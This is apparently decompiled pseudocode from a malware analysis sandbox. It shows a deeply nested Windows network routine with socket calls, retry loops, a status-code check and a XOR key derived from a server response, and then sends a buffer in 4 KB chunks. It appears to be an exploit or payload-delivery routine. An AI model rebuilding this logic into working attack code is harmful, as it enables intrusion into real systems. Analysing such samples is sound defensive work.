    					_v28 = 0;
    					_v36 = 0;
    					_v24 = 0;
    					_v20 = 0;
    					_t369 = E011E2EF5( *_t557, _t568, 0xc007, _t370 & 0x0000ffff, 0xfeff, _t371 & 0x0000ffff); // executed
    					__eflags = _t369;
    					if(_t369 != 0) {
    						break;
    					} else {
    						_t369 = E011E2F88( *_t557, _t568, 0xc007, _v40, 0xfeff,  &_v56, _v52, 0xd, 0, 0,  &_v36,  &_v24); // executed
    						__eflags = _t369;
    						if(_t369 != 0) {
    							break;
    						} else {
    							_t379 = _v36;
    							__eflags = _v36;
    							if(_v36 == 0) {
    								L99:
    								_push(_v52);
    								_push(_v56);
    								_push(0xfeff);
    								_push(_t611);
    								goto L100;
    							} else {
    								_v36 = E011E22A2(_t379, _v24);
    								E011E20D0( &_v40);
    								__eflags = _v36 - 0xff;
    								if(_v36 == 0xff) {
    									_t611 = 0;
    									__eflags = 0;
    									goto L99;
    								} else {
    									_t386 = E011E3061( *_t557, _t568, _v40,  &_v48, 0xfeff, _v56, _v52); // executed
    									__eflags = _t386;
    									if(_t386 != 0) {
    										_push(_v52);
    										_push(_v56);
    										_push(0xfeff);
    										_push(_v48);
    										L100:
    										_push(_v40);
    										_push( *_t557); // executed
    										E011E31FB(_t568); // executed
    										_t369 = E011E2068(_t557);
    										break;
    									} else {
    										_t369 = E011E1000(0xc);
    										_v12 = _t369;
    										__eflags = _t369;
    										if(_t369 == 0) {
    											break;
    										} else {
    											_t389 = E011E330E( &_v20,  *_t557, _v40, _v48, 0xfeff, _v56, _v52 + 1, 0xf0, _t369, 0, 0,  &_v20,  &_v40,  &_v24); // executed
    											_v68 = _t389;
    											E011E20D0( &_v60);
    											__eflags = _v68 - 0xffffffff;
    											if(_v68 == 0xffffffff) {
    												L127:
    												_push(_v52);
    												_push(_v56);
    												_push(0xfeff);
    												goto L128;
    											} else {
    												_t391 = _v36;
    												__eflags = _t391;
    												if(_t391 == 0) {
    													goto L127;
    												} else {
    													_t568 = 0x11;
    													__eflags = _t568 -  *((intOrPtr*)(_t391 + 0x1a));
    													if(_t568 ==  *((intOrPtr*)(_t391 + 0x1a))) {
    														_t572 =  *(_t391 + 0x16);
    														 *0x11ff8fc = 0xff;
    														__eflags = _t572;
    														if(_t572 == 0) {
    															 *0x11ff8fc = _t572;
    														}
    														__eflags = _t572 - 1;
    														if(_t572 == 1) {
    															 *0x11ff8fc = _t572;
    														}
    														__eflags = _a16;
    														if(_a16 != 0) {
    															_v12 = (( *(_t391 + 0x12) & 0x00ff0000 |  *(_t391 + 0x12) >> 0x00000010) >> 0x00000008 | ( *(_t391 + 0x12) << 0x00000010 |  *(_t391 + 0x12) & 0x0000ff00) << 0x00000008) ^ _t392 + _t392;
    															E011E20D0( &_v36);
    															__eflags = _v12;
    															if(_v12 == 0) {
    																goto L127;
    															} else {
    																_v24 = _v24 & 0x00000000;
    																_v44 = _v44 & 0x00000000;
    																_t395 = 0;
    																__eflags =  *0x11ff8fc - 1;
    																if( *0x11ff8fc != 1) {
    																	_t579 = 0x11f7090;
    																	_t618 = 0x11f6020;
    																} else {
    																	_t395 = 1;
    																	_t579 = 0x11ff900;
    																	_t618 = 0x11f7860;
    																}
    																__eflags = _t395;
    																__eflags = _t395;
    																_a16(_a20, _a24, _t618, ((_t395 == 0x00000000) - 0x00000001 & 0x00000200) + 0x1070, _t579, ((0 | _t395 == 0x00000000) - 0x00000001 & 0xfffffa00) + 0x7ce,  &_v44,  &_v24, _a28, _a32, _a36, _a40);
    																_v64 = _v64 & 0x00000000;
    																_v68 = _v68 & 0x00000000;
    																_t398 = E011E20EA(((_t395 == 0x00000000) - 0x00000001 & 0x00000200) + 0x1070,  &_v68,  &_v64, _v72, _v80);
    																__eflags = _t398;
    																if(_t398 != 0) {
    																	goto L127;
    																} else {
    																	_t620 = _v64;
    																	_t400 = _t620 + _v72 + 8;
    																	_v76 = _t400;
    																	_t401 = _t400 & 0x00000003;
    																	__eflags = _t401;
    																	if(_t401 != 0) {
    																		_t586 = 4;
    																		_t297 =  &_v76;
    																		 *_t297 = _v76 + _t586 - _t401;
    																		__eflags =  *_t297;
    																	}
    																	_t402 = E011E1000(_v76); // executed
    																	_v84 = _t402;
    																	__eflags = _t402;
    																	if(_t402 == 0) {
    																		L133:
    																		_t621 =  &_v68;
    																		goto L126;
    																	} else {
    																		__eflags = _v92;
    																		if(_v92 == 0) {
    																			goto L133;
    																		} else {
    																			memcpy(_t402, _v68, _t620);
    																			_t406 = _v80 + _t620;
    																			 *_t406 = _v72;
    																			 *((intOrPtr*)(_t406 + 4)) = 1;
    																			memcpy(_t406 + 8, _v92, _v72);
    																			E011E20D0( &_v68);
    																			_v84 = _v84 & 0x00000000;
    																			_v68 = _v68 & 0x00000000;
    																			_t624 = _v76 >> 0xc;
    																			_v56 = _v76 & 0x00000fff;
    																			__eflags = _t624;
    																			if(_t624 == 0) {
    																				L121:
    																				Sleep(0x456);
    																				__eflags = _v56;
    																				if(_v56 <= 0) {
    																					L123:
    																					E011E20D0( &_v80);
    																					goto L124;
    																				} else {
    																					_t416 = E011E3DD7(_v100 + 1,  *_t557, _v88, _v96, 0xfeff, _v104, _v100 + 1, _v60, _v56, _v80, _v76, _v84,  &_v68);
    																					__eflags = _t416;
    																					if(_t416 != 0) {
    																						goto L125;
    																					} else {
    																						goto L123;
    																					}
    																				}
    																			} else {
    																				_v64 = _v64 & 0x00000000;
    																				__eflags = _t624;
    																				if(_t624 == 0) {
    																					goto L121;
    																				} else {
    																					while(1) {
    																						_t420 = E011E3DD7(_v100 + 1,  *_t557, _v88, _v96, 0xfeff, _v104, _v100 + 1, _v60, 0x1000, _v80, _v76, _v84,  &_v68); // executed
    																						__eflags = _t420;
    																						if(_t420 != 0) {
    																							break;
    																						}
    																						_v84 = _v84 + 0x1000;
    																						_v64 = _v64 + 1;
    																						__eflags = _v64 - _t624;
    																						if(_v64 < _t624) {
    																							continue;
    																						} else {
    																							goto L121;
    																						}
    																						goto L131;
    																					}
    																					L125:
    																					_t621 =  &_v80;
    																					L126:
    																					E011E20D0(_t621);
    																					goto L127;
    																				}
    																			}
    																		}
    																	}
    																}
    															}
    														} else {
    															E011E20D0( &_v36);
    															_push(_v52);
    															_push(_v56);
    															_push(0xfeff);
    															_push(_v48);
    															_push(_v40);
    															_push( *_t557);
    															_push(0xd04b1e);
    														}
    														goto L131;
    													} else {
    														E011E20D0( &_v36);
    														_t424 = E011E35FA( *_t557, _t568, 0xffff, __eflags, 0x2801, _v40, _v48, 0xfeff, _v56, _v52, 2, 0xff, 0); // executed
    														__eflags = _t424 - 0xc0000205;
    														if(_t424 != 0xc0000205) {
    															goto L127;
    														} else {
    															__eflags = _a16;
    															if(_a16 == 0) {
    																L124:
    																_push(_v100);
    																_push(_v104);
    																_push(0xfeff);
    																_push(_v96);
    																_push(_v88);
    																_push( *_t557);
    																_push(0);
    																goto L131;
    															} else {
    																__eflags =  *0x11ff8fd - 3;
    																if( *0x11ff8fd >= 3) {
    																	goto L127;
    																} else {
    																	 *0x11ff8fd =  *0x11ff8fd + 1;
    																	__eflags = _v32 - 2;
    																	if(_v32 == 2) {
    																		L16:
    																		_v12 = 0;
    																		_t427 = E011E3EC8( &_v12, _t568,  *_t557, _v40, _v48, 0xfeff, _v56, _v52,  &_v28);
    																		__eflags = _t427;
    																		if(_t427 != 0) {
    																			goto L127;
    																		} else {
    																			_t428 = rand();
    																			_t628 = _v48;
    																			_v44 = _t428 & 0x0000ffff;
    																			_t430 = E011E407B(_t568,  &_v52,  *_t557, _v40, _t628, _t428 & 0x0000ffff, _v56, _v28);
    																			__eflags = _t430;
    																			if(_t430 != 0) {
    																				L134:
    																				_push(_v52);
    																				_push(_v56);
    																				goto L135;
    																			} else {
    																				_t606 = _v56;
    																				__eflags = E011E42DF( *_t557, _v40, _t628, _v44, _t606,  &_v52, _v28);
    																				if(__eflags != 0) {
    																					L136:
    																					_push(_v52);
    																					_push(_t606);
    																					L135:
    																					_push(_v44);
    																					_push(_t628);
    																					goto L129;
    																				} else {
    																					_t568 =  &_v44;
    																					_t434 = E011E489C( &_v52,  &_v44, __eflags,  *_t557, _v40, _t628, _t606, _v28);
    																					__eflags = _t434;
    																					if(_t434 != 0) {
    																						goto L136;
    																					} else {
    																						_t435 = E011E4BA1( &_v44,  *_t557, _v40, _t628, _v44, _t606, _v28);
    																						__eflags = _t435;
    																						if(_t435 != 0) {
    																							goto L136;
    																						} else {
    																							_t607 = _v28;
    																							_t436 = E011E51F3(_t607,  *_t557, _v40, _t628, _v44, _t606);
    																							__eflags = _t436;
    																							if(_t436 != 0) {
    																								goto L134;
    																							} else {
    																								_push(_v12);
    																								_push(_t607);
    																								_push(_v52);
    																								_push(_v44);
    																								_push(_t628);
    																								_push(_v40);
    																								_push( *_t557);
    																								_t437 = E011E5333(_v56,  &_v44);
    																								__eflags = _t437;
    																								if(_t437 != 0) {
    																									goto L137;
    																								} else {
    																									_t557 = _a4;
    																									goto L24;
    																								}
    																							}
    																						}
    																					}
    																				}
    																			}
    																		}
    																	} else {
    																		__eflags = _v32 - 3;
    																		if(_v32 == 3) {
    																			goto L16;
    																		} else {
    																			__eflags = _v32 - 4;
    																			if(_v32 != 4) {
    																				L24:
    																				__eflags = _v29 - 5;
    																				if(_v29 == 5) {
    																					L27:
    																					_t608 =  *_t557;
    																					_v13 = _v13 & 0x00000000;
    																					_t440 = E011E2547( &_v13, _v37, _v45, _v41, _v53, _v49);
    																					_v45 = _t440;
    																					__eflags = _t440;
    																					if(_t440 == 0) {
    																						L97:
    																						_push(_v49);
    																						_push(_v53);
    																						_push(_v41);
    																						L128:
    																						_push(_v48);
    																						L129:
    																						_push(_v40);
    																						_push( *_t557);
    																						goto L130;
    																					} else {
    																						_t441 = E011E1000(0x1000);
    																						_v21 = _t441;
    																						__eflags = _t441;
    																						if(_t441 == 0) {
    																							E011E20D0( &_v25);
    																							goto L97;
    																						} else {
    																							_v5 = _v5 & 0x00000000;
    																							_t444 = E011E688F(_t608, _v25, _v13 & 0x0000ffff); // executed
    																							__eflags = _t444;
    																							if(_t444 != 0) {
    																								L95:
    																								E011E20D0( &_v17);
    																								E011E20D0( &_v25);
    																								goto L96;
    																							} else {
    																								_t561 = _v17;
    																								_t447 = E011E243F(_t568, _t608, 1, _t561); // executed
    																								__eflags = _t447;
    																								if(_t447 != 0) {
    																									goto L95;
    																								} else {
    																									E011E20D0( &_v17);
    																									E011E20D0( &_v25);
    																									__eflags =  *(_t561 + 9);
    																									if( *(_t561 + 9) != 0) {
    																										L96:
    																										_t557 = _a4;
    																										goto L97;
    																									} else {
    																										_t450 = E011E3B5D(_t568, _t608, _v37, _v45, _v41, _v53, _v49); // executed
    																										__eflags = _t450;
    																										if(_t450 != 0) {
    																											goto L96;
    																										} else {
    																											Sleep(0x456); // executed
    																											_t452 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
    																											__eflags = _t452;
    																											if(_t452 != 0) {
    																												L137:
    																												_push(_v49);
    																												_push(_v53);
    																												_push(_v41);
    																												_push(_v45);
    																												_push(_v37);
    																												_push( *_a4);
    																												goto L130;
    																											} else {
    																												_t564 = _v49;
    																												_t609 = _v37;
    																												_t635 = _a4;
    																												_t454 = E011E2EF5( *(_t635 + 4), _t568, 0xc053, _t609, _v41, _t564); // executed
    																												__eflags = _t454;
    																												if(_t454 != 0) {
    																													L138:
    																													_push(_t564);
    																													goto L139;
    																												} else {
    																													_v13 = _v13 & _t454;
    																													_t459 = E011E2F88( *(_t635 + 4), _t568, 0xc007, _t609, _v41,  &_v13, _t564, 0xc, 0x12d, 0xfff0,  &_v33,  &_v21); // executed
    																													__eflags = _t459;
    																													if(_t459 != 0) {
    																														goto L138;
    																													} else {
    																														_t565 =  &_v54;
    																														_t461 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
    																														__eflags = _t461;
    																														if(_t461 != 0) {
    																															L140:
    																															_push(_v49);
    																															L139:
    																															_push(_v53);
    																															_push(_v41);
    																															_push(_v45);
    																															_push(_t609);
    																															_push( *_t635);
    																															goto L130;
    																														} else {
    																															_t463 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
    																															__eflags = _t463;
    																															if(_t463 != 0) {
    																																goto L140;
    																															} else {
    																																_t465 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 8))); // executed
    																																__eflags = _t465;
    																																if(_t465 != 0) {
    																																	goto L140;
    																																} else {
    																																	_t467 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
    																																	__eflags = _t467;
    																																	if(_t467 != 0) {
    																																		goto L140;
    																																	} else {
    																																		_t469 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0xc))); // executed
    																																		__eflags = _t469;
    																																		if(_t469 != 0) {
    																																			goto L140;
    																																		} else {
    																																			_t471 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x10))); // executed
    																																			__eflags = _t471;
    																																			if(_t471 != 0) {
    																																				goto L140;
    																																			} else {
    																																				_t473 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
    																																				__eflags = _t473;
    																																				if(_t473 != 0) {
    																																					goto L140;
    																																				} else {
    																																					_t475 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x14))); // executed
    																																					__eflags = _t475;
    																																					if(_t475 != 0) {
    																																						goto L140;
    																																					} else {
    																																						_t477 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
    																																						__eflags = _t477;
    																																						if(_t477 != 0) {
    																																							goto L140;
    																																						} else {
    																																							_t479 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
    																																							__eflags = _t479;
    																																							if(_t479 != 0) {
    																																								goto L140;
    																																							} else {
    																																								_t481 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x18))); // executed
    																																								__eflags = _t481;
    																																								if(_t481 != 0) {
    																																									goto L140;
    																																								} else {
    																																									_t483 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x1c))); // executed
    																																									__eflags = _t483;
    																																									if(_t483 != 0) {
    																																										goto L140;
    																																									} else {
    																																										_t485 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
    																																										__eflags = _t485;
    																																										if(_t485 != 0) {
    																																											goto L140;
    																																										} else {
    																																											_t487 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
    																																											__eflags = _t487;
    																																											if(_t487 != 0) {
    																																												goto L140;
    																																											} else {
    																																												_t489 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x20))); // executed
    																																												__eflags = _t489;
    																																												if(_t489 != 0) {
    																																													goto L140;
    																																												} else {
    																																													_t491 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x24))); // executed
    																																													__eflags = _t491;
    																																													if(_t491 != 0) {
    																																														goto L140;
    																																													} else {
    																																														_t493 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
    																																														__eflags = _t493;
    																																														if(_t493 != 0) {
    																																															goto L140;
    																																														} else {
    																																															_t495 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
    																																															__eflags = _t495;
    																																															if(_t495 != 0) {
    																																																goto L140;
    																																															} else {
    																																																_t497 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x28))); // executed
    																																																__eflags = _t497;
    																																																if(_t497 != 0) {
    																																																	goto L140;
    																																																} else {
    																																																	_t499 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
    																																																	__eflags = _t499;
    																																																	if(_t499 != 0) {
    																																																		goto L140;
    																																																	} else {
    																																																		_t501 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x2c))); // executed
    																																																		__eflags = _t501;
    																																																		if(_t501 != 0) {
    																																																			goto L140;
    																																																		} else {
    																																																			_t503 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
    																																																			__eflags = _t503;
    																																																			if(_t503 != 0) {
    																																																				goto L140;
    																																																			} else {
    																																																				_t505 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x30))); // executed
    																																																				__eflags = _t505;
    																																																				if(_t505 != 0) {
    																																																					goto L140;
    																																																				} else {
    																																																					_t507 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
    																																																					__eflags = _t507;
    																																																					if(_t507 != 0) {
    																																																						goto L140;
    																																																					} else {
    																																																						_t509 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x34))); // executed
    																																																						__eflags = _t509;
    																																																						if(_t509 != 0) {
    																																																							goto L140;
    																																																						} else {
    																																																							_t511 = E011E6727( &_a4, _t565,  &_a4, _a8, _a12); // executed
    																																																							__eflags = _t511;
    																																																							if(_t511 != 0) {
    																																																								goto L140;
    																																																							} else {
    																																																								_t513 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x38))); // executed
    																																																								__eflags = _t513;
    																																																								if(_t513 != 0) {
    																																																									goto L140;
    																																																								} else {
    																																																									Sleep(0x456);
    																																																									_t564 = _v49;
    																																																									_t515 = E011E2EF5( *(_t635 + 0x3c), _t568, 0xc053, _t609, _v41, _t564); // executed
    																																																									__eflags = _t515;
    																																																									if(_t515 != 0) {
    																																																										goto L138;
    																																																									} else {
    																																																										_t520 = E011E2F88( *(_t635 + 0x3c), _t568, 0x4007, _t609, _v41,  &_v13, _t564, 0xc, 0x12c, 0x87f8,  &_v33,  &_v21); // executed
    																																																										__eflags = _t520;
    																																																										if(_t520 != 0) {
    																																																											goto L138;
    																																																										} else {
    																																																											_t521 =  *(_t635 + 4);
    																																																											__eflags = _t521;
    																																																											if(_t521 != 0) {
    																																																												__imp__#3(_t521);
    																																																												_t187 = _t635 + 4;
    																																																												 *_t187 =  *(_t635 + 4) & 0x00000000;
    																																																												__eflags =  *_t187;
    																																																											}
    																																																											_t566 =  &_v54;
    																																																											_t523 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
    																																																											__eflags = _t523;
    																																																											if(_t523 != 0) {
    																																																												goto L140;
    																																																											} else {
    																																																												_t525 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x40))); // executed
    																																																												__eflags = _t525;
    																																																												if(_t525 != 0) {
    																																																													goto L140;
    																																																												} else {
    																																																													_t527 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
    																																																													__eflags = _t527;
    																																																													if(_t527 != 0) {
    																																																														goto L140;
    																																																													} else {
    																																																														_t529 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
    																																																														__eflags = _t529;
    																																																														if(_t529 != 0) {
    																																																															goto L140;
    																																																														} else {
    																																																															_t531 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x44))); // executed
    																																																															__eflags = _t531;
    																																																															if(_t531 != 0) {
    																																																																goto L140;
    																																																															} else {
    																																																																_t533 = E011E6727( &_a4,  &_v54,  &_a4, _a8, _a12); // executed
    																																																																__eflags = _t533;
    																																																																if(_t533 != 0) {
    																																																																	goto L140;
    																																																																} else {
    																																																																	_t535 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x48))); // executed
    																																																																	__eflags = _t535;
    																																																																	if(_t535 != 0) {
    																																																																		goto L140;
    																																																																	} else {
    																																																																		_t537 = E011E6727( &_a4, _t566,  &_a4, _a8, _a12); // executed
    																																																																		__eflags = _t537;
    																																																																		if(_t537 != 0) {
    																																																																			goto L140;
    																																																																		} else {
    																																																																			_t539 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x4c))); // executed
    																																																																			__eflags = _t539;
    																																																																			if(_t539 != 0) {
    																																																																				goto L140;
    																																																																			} else {
    																																																																				_t541 = E011E3CA0(0, _t568,  *((intOrPtr*)(_t635 + 0x50))); // executed
    																																																																				__eflags = _t541;
    																																																																				if(_t541 != 0) {
    																																																																					goto L140;
    																																																																				} else {
    																																																																					_t542 =  *(_t635 + 0x3c);
    																																																																					__eflags = _t542;
    																																																																					if(_t542 != 0) {
    																																																																						__imp__#3(_t542); // ws2_32 ordinal 3 = closesocket (matches the closesocket ref at 011E6229 in the API list)
    																																																																						_t211 = _t635 + 0x3c;
    																																																																						 *_t211 =  *(_t635 + 0x3c) & 0x00000000;
    																																																																						__eflags =  *_t211;
    																																																																					}
    																																																																					_t564 = _v49;
    																																																																					_t544 = E011E369D( *_t635, _t568, _t609, _v45, _v41, _v53, _t564); // executed
    																																																																					_push(_t564);
    																																																																					_push(_v73);
    																																																																					_push(_v61);
    																																																																					_push(_v65);
    																																																																					_push(_t609);
    																																																																					_push( *_t635);
    																																																																					__eflags = _t544;
    																																																																					if(_t544 != 0) {
    																																																																						L130:
    																																																																						_push(0xffffffff); // executed
    																																																																						L131:
    																																																																						_t374 = E011E5A46(); // executed
    																																																																					} else {
    																																																																						_t545 = E011E3C0A(_t568); // executed
    																																																																						__eflags = _t545;
    																																																																						if(_t545 != 0) {
    																																																																							goto L138;
    																																																																						} else {
    																																																																							_v21 = 2;
    																																																																							do {
    																																																																								__eflags = _v21 - 0xf;
    																																																																								if(_v21 == 0xf) {
    																																																																									goto L84;
    																																																																								} else {
    																																																																									_t548 = E011E3CA0(1, _t568,  *((intOrPtr*)(_t635 + _v21 * 4))); // executed
    																																																																									__eflags = _t548;
    																																																																									if(_t548 != 0) {
    																																																																										goto L138;
    																																																																									} else {
    																																																																										goto L84;
    																																																																									}
    																																																																								}
    																																																																								goto L132;
    																																																																								L84:
    																																																																								_v21 = _v21 + 1;
    																																																																								__eflags = _v21 - 0x14;
    																																																																							} while (_v21 < 0x14);
    																																																																							_t567 = 2;
    																																																																							while(1) {
    																																																																								__eflags = _t567 - 0xf;
    																																																																								if(_t567 == 0xf) {
    																																																																									goto L89;
    																																																																								}
    																																																																								L88:
    																																																																								_t550 = E011E3CA0(2, _t568,  *((intOrPtr*)(_t635 + _t567 * 4))); // executed
    																																																																								__eflags = _t550;
    																																																																								if(_t550 != 0) {
    																																																																									goto L140;
    																																																																								} else {
    																																																																									goto L89;
    																																																																								}
    																																																																								goto L132;
    																																																																								L89:
    																																																																								_t567 = _t567 + 1;
    																																																																								__eflags = _t567 - 0x14;
    																																																																								if(_t567 < 0x14) {
    																																																																									_t635 = _a4;
    																																																																									_t609 = _v37;
    																																																																									__eflags = _t567 - 0xf;
    																																																																									if(_t567 == 0xf) {
    																																																																										goto L89;
    																																																																									}
    																																																																								} else {
    																																																																									_t557 = _a4;
    																																																																									goto L91;
    																																																																								}
    																																																																								goto L132;
    																																																																							}
    																																																																						}
    																																																																					}
    																																																																				}
    																																																																			}
    																																																																		}
    																																																																	}
    																																																																}
    																																																															}
    																																																														}
    																																																													}
    																																																												}
    																																																											}
    																																																										}
    																																																									}
    																																																								}
    																																																							}
    																																																						}
    																																																					}
    																																																				}
    																																																			}
    																																																		}
    																																																	}
    																																																}
    																																															}
    																																														}
    																																													}
    																																												}
    																																											}
    																																										}
    																																									}
    																																								}
    																																							}
    																																						}
    																																					}
    																																				}
    																																			}
    																																		}
    																																	}
    																																}
    																															}
    																														}
    																													}
    																												}
    																											}
    																										}
    																									}
    																								}
    																							}
    																						}
    																					}
    																				} else {
    																					__eflags = _v29 - 6;
    																					if(_v29 == 6) {
    																						goto L27;
    																					} else {
    																						__eflags = _v29 - 7;
    																						if(_v29 != 7) {
    																							L91:
    																							E011E5A46(0,  *_t557, _v37, _v45, _v41, _v53, _v49); // executed
    																							E011E2068(_t557);
    																							Sleep(0x456); // 0x456 = 1110 ms back-off before the next attempt
    																							continue;
    																						} else {
    																							goto L27;
    																						}
    																					}
    																				}
    																			} else {
    																				goto L16;
    																			}
    																		}
    																	}
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    					L132:
    					return _t374;
    				}
    				_t374 = _t369 | 0xffffffff;
    				goto L132;
    			}
    0x011e5a7e
    0x011e62fc
    0x011e630a
    0x011e630f
    0x011e6316
    0x00000000
    0x00000000
    0x011e5a8f
    0x011e5a97
    0x011e5a9e
    0x011e5aa2
    0x011e5aa6
    0x011e5aaa
    0x011e5aae
    0x011e5ab9
    0x011e5abc
    0x011e5ac7
    0x011e5acb
    0x011e5acf
    0x011e5ad3
    0x011e5ad7
    0x011e5adc
    0x011e5ade
    0x00000000
    0x011e5ae4
    0x011e5b07
    0x011e5b0c
    0x011e5b0e
    0x00000000
    0x011e5b14
    0x011e5b14
    0x011e5b18
    0x011e5b1a
    0x011e6357
    0x011e6357
    0x011e635b
    0x011e635f
    0x011e6360
    0x00000000
    0x011e5b20
    0x011e5b2d
    0x011e5b31
    0x011e5b36
    0x011e5b3b
    0x011e6355
    0x011e6355
    0x00000000
    0x011e5b41
    0x011e5b55
    0x011e5b5a
    0x011e5b5c
    0x011e6375
    0x011e6379
    0x011e637d
    0x011e637e
    0x011e6361
    0x011e6361
    0x011e6365
    0x011e6367
    0x011e636e
    0x00000000
    0x011e5b62
    0x011e5b64
    0x011e5b69
    0x011e5b6d
    0x011e5b6f
    0x00000000
    0x011e5b75
    0x011e5ba1
    0x011e5baa
    0x011e5bae
    0x011e5bb3
    0x011e5bb8
    0x011e6618
    0x011e6618
    0x011e661c
    0x011e6620
    0x00000000
    0x011e5bbe
    0x011e5bbe
    0x011e5bc2
    0x011e5bc4
    0x00000000
    0x011e5bca
    0x011e5bcc
    0x011e5bcd
    0x011e5bd1
    0x011e6384
    0x011e6387
    0x011e638e
    0x011e6390
    0x011e6392
    0x011e6392
    0x011e6398
    0x011e639b
    0x011e639d
    0x011e639d
    0x011e63a3
    0x011e63a7
    0x011e6400
    0x011e6404
    0x011e6409
    0x011e640e
    0x00000000
    0x011e6414
    0x011e6414
    0x011e6419
    0x011e641e
    0x011e6420
    0x011e6427
    0x011e6437
    0x011e643c
    0x011e6429
    0x011e6429
    0x011e642b
    0x011e6430
    0x011e6430
    0x011e6459
    0x011e646f
    0x011e6489
    0x011e6490
    0x011e6499
    0x011e64a7
    0x011e64ac
    0x011e64ae
    0x00000000
    0x011e64b4
    0x011e64b4
    0x011e64bc
    0x011e64c0
    0x011e64c4
    0x011e64c4
    0x011e64c7
    0x011e64cb
    0x011e64ce
    0x011e64ce
    0x011e64ce
    0x011e64ce
    0x011e64d6
    0x011e64db
    0x011e64df
    0x011e64e1
    0x011e663b
    0x011e663b
    0x00000000
    0x011e64e7
    0x011e64e7
    0x011e64ec
    0x00000000
    0x011e64f2
    0x011e64f8
    0x011e6505
    0x011e6507
    0x011e650c
    0x011e651f
    0x011e652b
    0x011e6538
    0x011e653d
    0x011e6542
    0x011e654a
    0x011e654e
    0x011e6550
    0x011e65a5
    0x011e65aa
    0x011e65b0
    0x011e65b6
    0x011e65ef
    0x011e65f3
    0x00000000
    0x011e65b8
    0x011e65e6
    0x011e65eb
    0x011e65ed
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e65ed
    0x011e6552
    0x011e6552
    0x011e6557
    0x011e6559
    0x00000000
    0x011e655b
    0x011e655b
    0x011e658a
    0x011e658f
    0x011e6591
    0x00000000
    0x00000000
    0x011e6593
    0x011e659b
    0x011e659f
    0x011e65a3
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e65a3
    0x011e660f
    0x011e660f
    0x011e6613
    0x011e6613
    0x00000000
    0x011e6613
    0x011e6559
    0x011e6550
    0x011e64ec
    0x011e64e1
    0x011e64ae
    0x011e63a9
    0x011e63ad
    0x011e63b2
    0x011e63b6
    0x011e63ba
    0x011e63bb
    0x011e63bf
    0x011e63c3
    0x011e63c5
    0x011e63c5
    0x00000000
    0x011e5bd7
    0x011e5bdb
    0x011e5c06
    0x011e5c0b
    0x011e5c10
    0x00000000
    0x011e5c16
    0x011e5c16
    0x011e5c1a
    0x011e65f8
    0x011e65f8
    0x011e65fc
    0x011e6600
    0x011e6601
    0x011e6605
    0x011e6609
    0x011e660b
    0x00000000
    0x011e5c20
    0x011e5c20
    0x011e5c27
    0x00000000
    0x011e5c2d
    0x011e5c2d
    0x011e5c33
    0x011e5c38
    0x011e5c4c
    0x011e5c5d
    0x011e5c6d
    0x011e5c72
    0x011e5c74
    0x00000000
    0x011e5c7a
    0x011e5c7a
    0x011e5c84
    0x011e5c9b
    0x011e5c9f
    0x011e5ca4
    0x011e5ca6
    0x011e6641
    0x011e6641
    0x011e6645
    0x00000000
    0x011e5cac
    0x011e5cb2
    0x011e5cc8
    0x011e5cca
    0x011e6650
    0x011e6650
    0x011e6654
    0x011e6649
    0x011e6649
    0x011e664d
    0x00000000
    0x011e5cd0
    0x011e5cde
    0x011e5ce4
    0x011e5ce9
    0x011e5ceb
    0x00000000
    0x011e5cf1
    0x011e5d01
    0x011e5d06
    0x011e5d08
    0x00000000
    0x011e5d0e
    0x011e5d13
    0x011e5d1e
    0x011e5d23
    0x011e5d25
    0x00000000
    0x011e5d2b
    0x011e5d2b
    0x011e5d2f
    0x011e5d30
    0x011e5d34
    0x011e5d38
    0x011e5d39
    0x011e5d3d
    0x011e5d43
    0x011e5d48
    0x011e5d4a
    0x00000000
    0x011e5d50
    0x011e5d50
    0x00000000
    0x011e5d50
    0x011e5d4a
    0x011e5d25
    0x011e5d08
    0x011e5ceb
    0x011e5cca
    0x011e5ca6
    0x011e5c3a
    0x011e5c3a
    0x011e5c3f
    0x00000000
    0x011e5c41
    0x011e5c41
    0x011e5c46
    0x011e5d53
    0x011e5d53
    0x011e5d58
    0x011e5d6c
    0x011e5d70
    0x011e5d76
    0x011e5d8b
    0x011e5d90
    0x011e5d94
    0x011e5d96
    0x011e6344
    0x011e6344
    0x011e6348
    0x011e634c
    0x011e6621
    0x011e6621
    0x011e6625
    0x011e6625
